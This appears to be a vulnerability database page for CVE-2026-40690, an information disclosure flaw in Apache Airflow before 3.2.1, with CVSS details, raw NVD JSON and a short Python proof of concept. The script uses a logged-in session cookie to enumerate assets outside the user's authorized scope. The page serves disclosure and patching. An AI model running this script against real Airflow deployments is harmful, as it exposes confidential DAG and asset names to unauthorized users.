Security Vulnerability Report
CVE-2026-40690 CVSS 4.3 MEDIUM

CVE-2026-40690

Published: 2026-04-24 13:16:21
Last Modified: 2026-04-27 12:24:56

Description

The asset dependency graph did not restrict nodes by the viewer's DAG read permissions: a user with read access to at least one DAG could browse the asset graph for any other asset in the deployment and learn the existence and names of DAGs and assets outside their authorized scope. Users are recommended to upgrade to version 3.2.1, which fixes this issue.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - VULNERABLE
Apache Airflow < 3.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-40690: Apache Airflow Information Disclosure
# This script demonstrates how a user with limited read access can enumerate unauthorized assets.

TARGET_HOST = "http://localhost:8080"
SESSION_COOKIE = "session=.eJwlz..."  # Valid session cookie for a user with read access to at least one DAG


def check_asset_disclosure():
    headers = {
        "Cookie": SESSION_COOKIE,
        "Content-Type": "application/json",
    }
    # Endpoint to fetch asset edges (dependency graph)
    # Vulnerable versions return all assets regardless of specific DAG permissions
    url = f"{TARGET_HOST}/api/v1/asset/edges"
    try:
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            data = response.json()
            print("[+] Successfully retrieved asset dependency graph.")
            print(f"[+] Total assets found: {len(data.get('assets', []))}")
            # Print discovered asset names that might be outside authorized scope
            for asset in data.get("assets", []):
                print(f"  - Asset ID: {asset.get('id')}, Name: {asset.get('name')}, Type: {asset.get('type')}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    check_asset_disclosure()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40690", "sourceIdentifier": "[email protected]", "published": "2026-04-24T13:16:21.443", "lastModified": "2026-04-27T12:24:56.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The asset dependency graph did not restrict nodes by the viewer's DAG read permissions: a user with read access to at least one DAG could browse the asset graph for any other asset in the deployment and learn the existence and names of DAGs and assets outside their authorized scope.\n\nUsers are recommended to upgrade to version 3.2.1, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1220"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.2.1", "matchCriteriaId": "EF856E9C-C3C2-44F3-B2B4-0DD0791C512C"}]}]}], "references": [{"url": "https://github.com/apache/airflow/pull/65273", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://lists.apache.org/thread/bqt7y4g2cpj396b0sd20lv510ff19ndl", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/24/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}